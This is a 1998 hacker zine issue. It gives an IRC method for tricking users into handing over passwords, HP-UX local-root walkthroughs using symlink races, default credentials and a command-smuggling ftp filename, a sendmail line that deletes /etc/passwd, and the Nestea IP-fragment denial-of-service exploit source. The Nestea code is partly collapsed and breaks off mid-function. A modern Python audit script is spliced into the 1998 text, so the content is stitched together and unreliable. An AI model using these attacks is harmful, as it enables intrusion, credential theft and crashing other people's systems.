===========================================================================
                   *-*  Legions of the Underground  *-*
                          http://www.legions.org
                             (Keen_Veracity)
===========================================================================

Content: /Z1#P10.01/

o-NEWS-o
  *About                                   - optiklenz
  *Beach Con                               - sync
  *Phreak Zine                             - optiklenz
  *This Month's Linkage                    - LegionPhreak

o-IRC-o
  *Irc Social Engineering (revisited)      - optiklenz
  *Legions Script (BitchX)                 - HyperLogik

o-Neophytes-o
  *Basic Unix Commands                     - optiklenz
  *Exploits?                               - miah

o-Security-o
  *HPUX Security Overview (revised)        - tip
  *HPUX Exploits Note (bugs)               - optiklenz
  *Nesta Exploit (advisory)                - dallion
  *Infoseek (exploit)                      - optiklenz
  *Fake Mail (revised)                     - optiklenz
  *Wingate Exertion                        - optiklenz
  *backdoor.c                              - jsbach
  *Ip Spoofing                             - optiklenz
  *Anal Sniff                              - chronic
  *Back Attack                             - chrak
  *Irix LMR                                - optiklenz
  *Securing Linux                          - BlackIC
  *FoolProof                               - Duncan Silver

o-Misc-o
  *pnp56K Linux Setup                      - mosoka
  *Sniffer Log                             - chrak

o-Comic Relief-o
  *Young Hackers, and Jail                 - Ana1yzer
__________________________________________________________________

- { = - = N E W S = - = } -

[ABOUT]-------------------------------------| optiklenz |

This zine covers different aspects of computing. This month's security
focus is concentrated on the HP-UX platform. This month's guest editor is
Analyzer. Guest editors, along with the topic the editor is writing on,
will change monthly.

Most of our articles and zines for the past 6 years have been distributed
through bulletin board services, our own Electronic Source and Abyss BBS
just to name a couple. This is actually our first zine release being
distro'd via the web. We release a new zine every month. If you would like
to submit an article for the next zine, send email to webmaster@legions.org
with the subject matter of the article. Also, if there is a certain subject
you'd like to see written about in the next zine, please let us know.

(1)------------NEWS-------------------------------------(1)

[Beach Con]-------------------------------------| sync |

Last year's Legion Con's (cyber con) theme was network utilization; this
year there will be a multitude of themes which range from mainstream
security and cryptology to telephony and other types of electronic
manipulation.

(2)------------NEWS-------------------------------------(2)

[Phreak Zine]-------------------------------------| optiklenz |

We are currently working on our Phreak zine. There is progress, but
production is going extremely slowly, since members are currently occupied
with their own activities. An example of some of the zine's content is
listed below.

[o] Shadowing your ANI
[o] Detailing, and using a beige box..
[o] ATT-CONF
[o] Phone Tapping
[o] Discreet frequencies
[o] Telenet #'s
[o] More...

Want to submit an article? Mail webmaster@legions.org with the article
title first. We will either "ok" it or decline it depending on your article
content or if someone has already chosen the same subject matter.
(3)------------NEWS-------------------------------------(3)

[Linkage]-------------------------------------| LegionPhreak |

This Month's Linkage:

They finally have a static layout      A UDDF.NET production (www.uddf.net)
http://www.hackers.com                 http://www.hackedsites.com

Exploits Galore                        Beat your Meat (It's good for you)
http://www.rootshell.com               http://www.freshmeat.net

Rhino9                                 Unix Guru
http://www.rhino9.com                  http://www.ugu.com/

Link of the month: www.legions.org

(4)------------NEWS-------------------------------------(4)

- { = - = I R C = - = } -

[Social Engineering]-------------------------------------| optiklenz |

Gaining users' passwords via IRC

Method 1.

First you need to have 2 IRC clients open. This method is more authentic
if you have operator status in the channel. On one of the open clients name
yourself Bot, or something to that effect, and on the other client use your
regular nick. If someone is looking to get ops, let them know that there is
a Bot in the channel, and if the user/users want ops they must first
identify themselves with the Bot using the /msg Bot identify password
command. After you tell them this, leave the room or not; either way the
passwds will come rolling in. It's less suspicious if you leave, though,
because people will think damage can't be done if you're not there to do
it, when in fact you are still there, because you are the Bot just sitting
there collecting passwds. These passwds may be for their email account,
website, and other things. So go back later and ask the people that fell
for it if they have a website, or for their email address, etc, etc.

(5)------------IRC--------------------------------------(5)

[Legions Script]-------------------------------------| Hyperlogik |

Legions script for Linux is due out in a few weeks. More info will be
posted in the next zine.
(6)------------IRC--------------------------------------(6)

- { = - = N E O P H Y T E S = - = } -

Note: The content of the neophytes section will grow more in-depth every
month, escalating from basic to median, and so on...

[Basic Unix Commands]-------------------------------------| optiklenz |

who           shows who is logged on the system
write name    name equiv to the person you want to chat with (ctrl D exits
              chat mode; EOT End of Transfer)
du -a         mem check
ps -pid user  kills a user
passwd        Change your user's passwd
ls            List all files in a directory (ls -a)
telnet        start a telnet session
open          open a location
ftp           start file transfer session
find          Find a file
cd\dir        dir being sub-directory
netstat       See current processes running among your connection.
chgrp         Changes a file's group ownership
cat "file"    type contents; try cat /etc/passwd
tcpdump       Packet sniffer, monitor packets in promiscuous mode
rmdir         Deletes one or more directories
sleep         Causes a process to become inactive for a specified amount
              of time
sort          Sort and merge one or more files
spell         Finds spelling errors in a file
split         Divides a file
stty          Displays or sets terminal parameters
tail          Displays the end of a file
troff         Outputs formatted output to a typesetter
tset          Sets other terminal type
umask         Allows the user to specify a new creation mask
uucp          Unix-to-Unix copy
vi            Full screen editor
wc            Displays details in the file size
who           Displays information on the system users
write         Used to send a message to another user
ifconfig      To see the routing layout/destination of packets etc
gcc           Compile C based code
rm            delete file
mv            rename
bfs           Scans a large file
cal           Displays a calendar
mkdir         Create a directory
chmod         Assign file permissions

TIP: If you have temp access to a system, chmod 777 $home or chmod $email
so you have access to their home directory, as well as their email later.
(7)------------NEOPHYTES--------------------------------------(7)

[Exploits]-------------------------------------| miah |

A lot of people ask me about exploits: what they are, what they do, and
how they use them. Well, I'm writing this document to explain this for
hopefully my last time. It's just starting to bother me that I have to
explain this every time I'm on IRC, so I thought there should be a text
explaining them. Well, here it is.

--- What is an 'Exploit'? ---

Well, to explain this simply, an exploit is a program that 'exploits' a
bug in a specific piece of software. All exploits are different; they do
different things and exploit different bugs, that's why exploits are
always program specific. Exploits are made to get root on different
operating systems. They achieve this by exploiting a bug in software when
the software is running as root. In UNIX type OS's, software may have to
run as root (or UID 0) in order to perform a specific task that cannot be
performed as another user. So basically the exploit crashes the software
while running as root to give you the beautiful root prompt. Well, now
that I've answered questions one and two, I'm going to move on to
question 3.

--- How do I use an exploit? ---

Since exploits are coded in C 99% of the time, you need a shell on the box
you are going to use the exploit on, OR you need to be running the same OS
as the box you are attempting to hack. So basically, you need to put the
source code or the binary in your shell account's dir (you want to use a
hacked shell, or a shell that isn't yours, for this :) ). To put it on
your shell, you can ftp to your account and upload it that way, or you can
use rz if you are using a dialup shell. Either way, I shouldn't have to
explain those two things too much, it's pretty easy. Once you have the
exploit on the box you just need to compile it. Usually you would compile
the exploit like so:

blah:~/$ gcc exploit.c

That should compile your exploit.
However, be aware that some exploit coders are sneaky pests and like to
pick on people who don't know C, so they will sometimes insert bugs into
the exploit, thus making it impossible to compile. So it does help to know
C when playing with C :) After the compiling is done, you should be able
to just run the exploit, and its work will be done when you see the root
prompt. However, not all exploits are the same, and some might require
different command lines to get them to work.

--- Where can I get some exploits? ---

Well, 2 of the best places I have found for exploits are
http://get.your.exploits.com and http://www.rootshell.com

(8)------------NEOPHYTES--------------------------------------(8)

- { = - = S E C U R I T Y = - = } -

[Hpux Security Overview]-------------------------------------| tip |

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                   HP-UX: A Security Overview, Part One
                             revision02 17mar98
                           http://www.legions.org
---------------------------------------------------------------------------
Table of Contents:
1) Intro and Disclaimer          5) The Trusted System
2) HP-UX: an Overview            6) Resources
3) The Setup by Default          7) Exploits
4) HP-UX Security Measures       8) To Be Continued
---------------------------------------------------------------------------

1) Intro and Disclaimer

a) This text is designed to complement general Unix knowledge. All Unix
   OS's are different in their own right. This text will delve into
   HP-UX-specific areas. This is not a Unix tutorial, rather a supplement
   to fundamental Unix hacking knowledge.

b) This text will cover HP-UX version 10.x primarily. Specifically, 10.10
   and 10.20 will be in mind. 11.0 has been released and I haven't gotten
   to checking it out yet. 9.x is old, and no longer supported by HP.
   Thus, the most logical choice (and most popular version of HP-UX) is
   10.x.

c) I'm not perfect; please notify me of any errors in the document. Also,
   if you see anything you want added to this file, feel free to send it
   to me.
d) This text was written for educational purposes only.

e) Thanks to HP, rootshell, and the various other hacker folks that have
   helped me write this article. Special thanks to Colonel Panic for
   finding many exploits, some of which I have used as examples. Shouts
   out to my fellow LoU members, the SOD, and the Chicago crew.

---------------------------------------------------------------------------

2) HP-UX: an Overview

Largely based on SysV, Hewlett Packard's version of Unix, HP-UX, has
undergone many changes and many version updates (current version is
11.0). While robust in many areas (ie, memory management, overall
performance, etc), security leaves much to be desired. HP's vision of Unix
seems to come from that of a closed network with non-malicious users (ie,
/usr/local being world-writeable); only recently has the Internet been an
explosion, and HP seems to be playing "catch up" to network and internal
security.

HP's solution to security problems has been patches. Lots of patches. You
can see the patches on a system by typing "swlist -l product" (substitute
"fileset" for "product" for more specific information). Patch and software
information is stored in /var/adm/sw, so you can check out older
pre-patched binaries there. As usual, system logs are kept in /var/adm
(along with btmp, utmp, and wtmp).

---------------------------------------------------------------------------

3) The Setup by Default

By default, HP-UX is VERY insecure. Yes, most Unixes are (by default), but
HP-UX even more so. Here is a brief listing of what is insecure by
default:

o /usr/local and subdirectories are world writeable.
o Many applications by default are installed as world writeable (ie, the
  measureware database module for oracle installs this way).
o root's umask is set to: 02.
o cue is installed (see section 6 for the exploit).
o System is un-"Trusted." See section 4.
o Direct login as root possible from all ttys (as result of being
  un-"Trusted").
o System logging is set pretty minimal (see /etc/syslog.conf); not that it
  matters, as system logging is pretty minimal no matter how you have it.
o /etc/logingroup non-existent. While this is not an insecurity, it's
  worth mentioning.

---------------------------------------------------------------------------

4) HP-UX Security Measures

o Suid scripts not possible

  This is a popular trend in newer Unix OS's. Basically, if you have a
  suid script, it will not be run as root. Binaries are what's important.

o Dialup passwords

  You can set an additional password for a dialin device. If you dialed
  into an HP-UX server with dialup passwords enabled, you would enter your
  usual login and password, then an _additional_ dialup password. Each
  dialup password is dependent on the shell; the shell is used as the
  "login" field. To explain further, look at /etc/d_passwd:

  /bin/sh:qKrbuYLg9B2vU:0:0:::
  /bin/csh:4LcBNqYbmdp3Y:0:0:::
  /bin/ksh:zKanqUcdEzh3Q:0:0:::

  What's important here are the first two fields (obviously). Two other
  things to note. Firstly, if the system is relatively secure, the "login"
  field can only be eight characters long. This creates a problem if your
  shell is "/usr/local/bin/tcsh" (19 chars). Thus, what's done is either:
  a link is created that is less than eight characters (ie, /bin/tsh ->
  /usr/local/bin/tcsh) or dialup passwords just aren't used. Secondly, the
  file to reference which tty the dialin is located on is /etc/dialups:

  /dev/ttyd0p7

  That's it. That's the format of the file.

o lanscan and ioscan

  Just a side note to the standard commands, ifconfig and netstat. lanscan
  will tell you what interface cards you have on the system, which are up
  or down, etc, etc. ioscan is similar, but covers the entire system, ie,
  hard drives, I/O adapters, memory, etc. Might be useful in getting more
  intimate with your system.

---------------------------------------------------------------------------

5) The Trusted System

What is a "Trusted System"? Check for a /tcb directory.
The existence of a /tcb directory signifies that the system you're on is a
"Trusted System." The conversion to this is done through /usr/sbin/sam by
root. Here is what converting does to a system:

o Pseudo-shadow password scheme (actually uses a "protected password
  database").
o A stricter password authentication system.
o User auditing.
o Access control lists (acls) [note: only supported under hfs, not vxfs]
  [second note: being phased out].
o Terminal and time-based access control.

Basically, to put this all together: in the /tcb/files/auth directory,
there are a number of subdirectories named by capital and lowercase
letters, ie, "e," "T," and so forth. This is the initial of the login. In
that directory is a file per user. Thus, root's file would be
/tcb/files/auth/r/root. What's in this file? It's basically like a
password entry, with more fields. ie, /tcb/files/auth/r/root:

root:u_name=root:u_id#0:\
    :u_pwd=Z1Po84UVyBbGE:\
    :u_bootauth:u_auditid#0:\
    :u_auditflag#1:\
    :u_pswduser=root:u_suclog#8895646615:u_lock@:chkent

root's entry in /etc/passwd would then be:

root:*:0:3:root:/:/sbin

If it isn't obvious, the login and user id of an /etc/passwd entry are
there, along with additional information. The above example has only a few
fields listed. The full contents of an HP-UX password database file would
contain:

a  login and user id
b  encrypted password
c  account owner
d  single user mode boot flag
e  audit id and audit flag
f  minimum time between password change (not in example - u_minchg)
g  password max length (not in example - u_maxlen)
h  password expiration time (not in example - u_exp)
i  password lifetime (not in example - u_life)
j  time of last password change (not in example - u_usucchg & u_unsucchg)
k  absolute password expiration date (not in example - u_acct_expire)
l  max time allowed between logins (not in example - u_max_llogin)
m  max days before expiration when warning will appear (not in example -
   u_pw_expire_warning)
n  user or system generated password? (not in example - u_pickpw)
o  type of system passwords (not in example - u_genpwd)
p  triviality check on user-gen (not in example - u_restrict)
q  can pick null password? (not in example - u_nullpw)
r  userid of last person who changed this password (not in example -
   u_pwchanger)
s  random # that user must supply (given to him by the admin) when
   password is reset (not in example - u_pwd_admin_num)
t  can user generate random # for a password? (not in example -
   u_genchars)
u  can user generate random letters for a password? (not in example -
   u_genletters)
v  time of day when user can login (not in example - u_tod)
w  time of last successful login (not in example - u_suclog)
x  time of last unsuccessful login (not in example - u_unsuclog)
y  term or remote hosts from last successful and unsuccessful logins (not
   in example - u_suctty & u_unsuctty)
z  number of unsuccessful logins, this # clears upon a successful login
   (not in example - u_numunsuclog)
1  max number of login attempts before account is locked (not in example -
   u_maxtries)
2  account locked flag (not in example - u_lock)

In /tcb/files, in addition to auth, there are two files, devassign and
ttys. devassign contains device access info and ttys contains term access
info. Here are a few lines from devassign:

console:v_devs=/dev/console:v_type=terminal:chkent:
ttyp0:v_devs=/dev/ttyp0:v_type=terminal:chkent:
ttyp1:v_devs=/dev/ttyp1:v_type=terminal:chkent:

The format of this file contains:

a  device name
b  aliases to that device
c  device supported (ie, printer, terminal, tape, or remote)
d  users permitted on that device; if not specified, all users may use it

Here are a few lines from ttys:

console:t_devname=console:t_maxtries#777:chkent:
tty:t_devname=tty:chkent:
tty00:t_devname=tty00:chkent:

The above example only has a few fields listed.
The full format of this file contains:

a  device name
b  last user (id) to log into that tty (not in example - t_uid)
c  last successful login time (not in example - t_logtime)
d  last unsuccessful login time (not in example - t_unsuctime)
e  number of consecutive logins before tty is locked
f  terminal lock flag

In all actuality, not many HP-UX systems are set up to be Trusted.
Managing a password database and tweaking is more work than necessary. In
addition, remote commands are not possible on a Trusted System, unless
they are done _from_ a Trusted System. Lastly, mapping files to sync
/etc/passwd with /tcb/files/auth are contained in /tcb/files/auth/system.
These are called pw_id_map, gr_id_map, and aid_id_map. It is very likely
that these mapping files will get out of sync with the database files. The
solution is removing them and letting them regenerate. However, all in
all, having a Trusted System can prove to take as much maintenance as an
un-Trusted System. It's really the admin's call. I've seen maybe about
half and half these days.

---------------------------------------------------------------------------

6) Resources

o If you have a question about a patch, check out
  ftp://us-support.external.hp.com. All the current patches are available
  there for your perusal.
o http://www.rootshell.com, http://get.your.exploits.org,
  http://www.hha.net/hha/exploits,
  http://www.dhp.com/~fyodor/sploits_hpux.html: Very good sites with Unix
  and HP-UX-specific exploits. Both explanations and source code/scripts
  are available here.
o Usenet: comp.os.security.announce and comp.sys.hp.hpux: Sometimes
  regular updates of weaknesses. Avoid alt.2600 at all costs.
o And of course, the ever-so-handy man command.

---------------------------------------------------------------------------

7) Exploits

These are only a few of many. I only added a few, as I wanted to explain
about HP-UX security in general. Part 2 will delve deeper into exploits
(as well as auditing, system calls, and acls).
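Before the individual bugs, an added example going back to the file formats of section 5 (this is not code from tip's article or from HP): a parser for the termcap-style fields shared by /tcb/files/auth entries and the ttys/devassign files, plus a few audit checks an admin of a Trusted System would want over the parsed entries. Assumptions: the meaning of "name@" (flag off) versus a bare "name" (flag on) follows termcap convention, and the sam_exec entry is constructed for illustration, not taken from any real system.

```python
import re
from typing import Dict, List, Union

FieldValue = Union[str, int, bool]
Entry = Dict[str, FieldValue]

# Constructed from the root entry quoted in section 5 (a line ending in
# ":\" continues on the next line, which starts with ":").
SAMPLE_ROOT_ENTRY = r"""root:u_name=root:u_id#0:\
    :u_pwd=Z1Po84UVyBbGE:\
    :u_bootauth:u_auditid#0:\
    :u_auditflag#1:\
    :u_pswduser=root:u_suclog#8895646615:u_lock@:chkent"""

# Constructed for illustration only (not from any real system): a uid-0
# helper login of the kind "Old SAM bug 2" describes, with auditing off,
# null passwords permitted, three failed logins and the lock flag off.
SAMPLE_SAM_EXEC_ENTRY = r"""sam_exec:u_name=sam_exec:u_id#0:\
    :u_auditflag#0:u_nullpw:u_numunsuclog#3:u_lock@:chkent"""

# Constructed from the /tcb/files/ttys lines quoted in section 5.
SAMPLE_TTYS = """console:t_devname=console:t_maxtries#777:chkent:
tty:t_devname=tty:chkent:
tty00:t_devname=tty00:chkent:
"""

# ":\" + newline + optional indent + ":" joins two physical lines.
_CONTINUATION = re.compile(r":\\\n[ \t]*:")


def parse_tcb_entry(text: str) -> Entry:
    """Parse one termcap-style /tcb entry into a dict.

    Field syntax (termcap conventions, assumed here):
      name=value  string field
      name#123    numeric field
      name@       boolean explicitly off (u_lock@: not locked)
      name        boolean on (u_bootauth: may boot single-user)
    The first field is the entry key (login or device name); the
    trailing "chkent" sentinel marks the entry as complete.
    """
    joined = _CONTINUATION.sub(":", text.strip())
    fields = [f for f in joined.split(":") if f]
    if not fields:
        raise ValueError("empty /tcb entry")
    entry: Entry = {"_key": fields[0], "_complete": False}
    for raw in fields[1:]:
        if raw == "chkent":
            entry["_complete"] = True
        elif "=" in raw:
            name, value = raw.split("=", 1)
            entry[name] = value
        elif "#" in raw:
            name, value = raw.split("#", 1)
            entry[name] = int(value)
        elif raw.endswith("@"):
            entry[raw[:-1]] = False
        else:
            entry[raw] = True
    return entry


def parse_tcb_file(text: str) -> List[Entry]:
    """Parse a multi-entry file such as /tcb/files/ttys or devassign."""
    entries: List[Entry] = []
    buf: List[str] = []
    for line in text.splitlines():
        if not line.strip() and not buf:
            continue  # blank line between entries
        buf.append(line)
        if not line.rstrip().endswith("\\"):  # no continuation: entry done
            entries.append(parse_tcb_entry("\n".join(buf)))
            buf = []
    if buf:  # file ended in the middle of a continued entry
        entries.append(parse_tcb_entry("\n".join(buf)))
    return entries


def audit_account(entry: Entry) -> List[str]:
    """Audit findings for one /tcb/files/auth entry (empty list = clean)."""
    findings: List[str] = []
    if not entry["_complete"]:
        findings.append("entry lacks chkent sentinel (truncated or corrupt)")
    if entry.get("u_id") == 0 and entry["_key"] != "root":
        findings.append("uid 0 login other than root")
    if entry.get("u_auditflag") != 1:
        findings.append("auditing disabled for this account")
    if not entry.get("u_pwd"):
        findings.append("empty or missing encrypted password")
    if entry.get("u_nullpw") is True:
        findings.append("null password permitted")
    if entry.get("u_lock") is False and entry.get("u_numunsuclog", 0) > 0:
        findings.append("unlocked account with %d failed logins"
                        % entry["u_numunsuclog"])
    return findings
```

Running audit_account over every file under /tcb/files/auth/*/ gives a quick picture of which accounts the conversion to a Trusted System actually protects.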
o cue bug

  The first thing after gaining access to an HP-UX system is to check if
  cue exists (typically in /usr/bin/cue). Make sure it's an suid binary
  (which it is by default). Simply set your umask to 000. Now start cue.
  In your home directory, do an ll. You'll see that the file created by
  cue (in my case, it's called "IDMERROR.ttyp1") is owned by root. You'll
  also see that the umask follows and it is world-writeable. Now exit cue.
  Remove the *ERROR* file created by cue. Think of a file like /etc/passwd
  or /.rhosts. Do an "ln -s /etc/passwd ~/IDMERROR.ttyp1" (or whatever
  suits your needs). Now start cue again. Exit it. You'll see that the
  root owned file that wasn't writeable by anyone not only is now
  truncated, but it has world write permission. Do whatever you want with
  it.

o ftp mget bug

  This won't do you much good if ftp isn't suid root (most likely it won't
  be), but this still works (not as root though). In /tmp, create a
  separate directory (we'll use "test"). cd to that directory and execute
  this command: echo "date > /tmp/BLAH" > "|sh". Notice that /tmp/BLAH
  does not exist. Now, ftp to localhost. cd to /tmp/test and do a "mget
  *". ftp that file. Now quit ftp and check for a /tmp/BLAH. It exists!
  cat it. Now what if ftp was suid root, and the echo command you used to
  create "|sh" was this: echo "chmod 777 /etc/passwd" > "|sh"?

o Old SAM bug

  Typically, when SAM (System Administration Manager) is being run by an
  admin, a temp file is created in /var/tmp. Newer, patched SAMs use
  arbitrary file names, ie OBAMDBAa01687 or aaaa01990, etc. But older SAMs
  used a consistent file name when writing this temp file. It was called:
  outdata. Since SAM is typically run as root, you'll see what I'm getting
  at here (duh, the temp file is owned by root). Simply create a link to a
  file, such as /etc/passwd, to that temp file (ie, ln -s /etc/passwd
  /var/tmp/outdata). Now if root's umask is set to 000, then you'll own
  /etc/passwd next time the admin runs SAM.
  This trick is unlikely these days, as most SAMs are patched and most
  admins don't use umask 000 on root.

o Old SAM bug 2

  On older versions of SAM, a user named sam_exec was created with uid 0.
  The default password for this on 10.x is: x7vpa5jh
  Simply login as sam_exec, and hit control-c right away for a shell.

o ppl bug

  Another symbolic link exploit. ppl's log file is: /var/ppl/log. Now, you
  can simply remove or move this (so that /var/ppl/log is non-existent;
  also /var/ppl is world-writeable by default, thus you can do this). This
  log file is owned by root (ppl is an suid program). Next, think of a
  file that you'd like to nuke and own (if you don't want to get caught,
  try /.rhosts instead of something like /etc/passwd; in addition, save
  the old /var/ppl/log somewhere to put back when you're done). Now do a:
  ln -s /.rhosts /var/ppl/log. Then type: ppl -o '\ + + ' or whatever you
  want to place in /.rhosts. You get the drift. Now you can remove
  /var/ppl/log and put the old one back in place. You can now rlogin as
  root.

o Educational Centers

  HP's educational centers are protected mainly by firewalls. But if you
  happen to get in, the root password on nearly all machines is simply:
  hp.

---------------------------------------------------------------------------

8) To Be Continued

Part Two will delve deeper into the Trusted System, specifically covering
auditing and acls. Exploits will also be covered in greater detail.

---------------------------------------------------------------------------
(c) 1998 tip of Legions of the Underground
http://www.legions.org
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

(10)------------SECURITY--------------------------------------(10)

[Hpux Exploits Note]-------------------------------------| optiklenz |

HP_UX versions 1.2&13.1   sm, -oQ ==> can read/write any file
5.57                      from:<"|/bin/rm /etc/passwd"> && bounce mail....
HPUX <7.0        1-- chfn -- allows newlines, etc ()
HP-UX            1-- sendmail: mail directly to programs ()
HPUX A.09.01     1-- sendmail: mail directly to programs ()

1) libXt: this is a widely known security hole that allows local users to
   gain root access via setuid X programs like xterm or xload. A
   recommendation is to replace the guilty libraries by applying X/Motif
   "jumbo" patches, which is a good thing anyway.

2) sendmail: yet another sendmail hole. The best solution at CERN is maybe
   to use the public domain version of sendmail (used by default on all
   HP-UX 10.20 systems) that does not seem vulnerable.

(10)------------SECURITY--------------------------------------(10)

[Nesta Exploit]-------------------------------------| Dallion |

---------------------------------------------------------
Note: Nestea by humble
Code ripped from teardrop by route
---------------------------------------------------------

Basically crashes a machine using "off by one" ip headers. Like boink and
land reversed. It's a total rip (the code, that is) but it works,
nonetheless. I have tested it on machines running kernel 2.0.33 and
2.1.95; both machines went slamming down when I hit them. I like this toy
:)

To fix it:
1) if you do packet filtering set it to filter off by one ip headers
2) fix your kernel to not process these packets.

-Dallion Dalson

Here is the exploit:

_ 01. nestea.c - exploits the "off by one ip header" bug in Linux

//
// nestea.c by humble of rhino9 4/16/98
// This exploits the "off by one ip header" bug in the linux ip frag code.
// Crashes linux 2.0.* and 2.1.* and some windows boxes // this code is a total rip of teardrop - it's messy // hi sygma #include #include #include #include #include #include #include #include #include #include #include // bsd usage is currently broken because of socket options on the third sendto #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define MAGIC2 108 #define PADDING 256 /* datagram frame padding for first packet */ #define COUNT 500 /* we are overwriting a small number of bytes we shouldnt have access to in the kernel. to be safe, we should hit them till they die :> */ void usage(u_char *); u_long name_resolve(u_char *); u_short in_cksum(u_short *, int); void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv) { int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; struct in_addr addr; if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 3) usage(argv[0]); if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } while ((i = getopt(argc, argv, "s:t:n:")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short)atoi(optarg); break; case 't': /* dest port (DNS, anyone?) 
                            */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':           /* number to send */
                count = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;          /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n");
    fprintf(stderr, "Death on flaxen wings (yet again):\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

/*
 * Each call sends three fragments of one datagram (IP id 242):
 *   1: offset 0, MF set, 20-byte header, 18 bytes of payload (bytes 0-17)
 *   2: offset 6 (byte 48), MF clear, UDPH + MAGIC2 bytes of payload, so it
 *      claims to be the last fragment
 *   3: offset 0, MF set, but with a 60-byte header (IHL 15) and a total
 *      length of IPH + UDPH + PADDING + 40, so its payload starts at byte 0
 *      and covers IPH + UDPH + PADDING + 40 - 60 bytes: it overlaps both
 *      earlier fragments and runs past the end the second one declared.
 * That overlap is what the target's reassembly code has to cope with.
 */
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    int i;
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    packet = (u_char *)malloc(IPH + UDPH + PADDING+40);

    /* fragment 1 */
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + 10);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + 10);        /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
               sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /* fragment 2 */
    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = FIX(6);       /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + MAGIC2);    /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
               sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /* fragment 3 */
    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);

    byte = 0x4F;                        /* IP version and header length (IHL 15) */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
